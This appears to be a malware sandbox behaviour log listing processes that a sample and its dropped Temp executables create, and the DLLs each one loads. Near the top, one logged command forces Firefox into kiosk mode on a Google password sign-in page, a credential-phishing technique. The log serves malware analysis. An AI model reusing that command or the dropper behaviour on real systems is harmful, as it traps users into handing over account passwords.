Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2336 -parentBuildID 20230927232528 -prefsHandle 2272 -prefMapHandle 2264 -prefsLen 25307 -prefMapSize 239752 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e7c1ee17-f254-4518-bacd-57c97958ed1d} 4992 "\\.\pipe\gecko-crash-server-pipe.4992" 1c6f5e6ff10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll
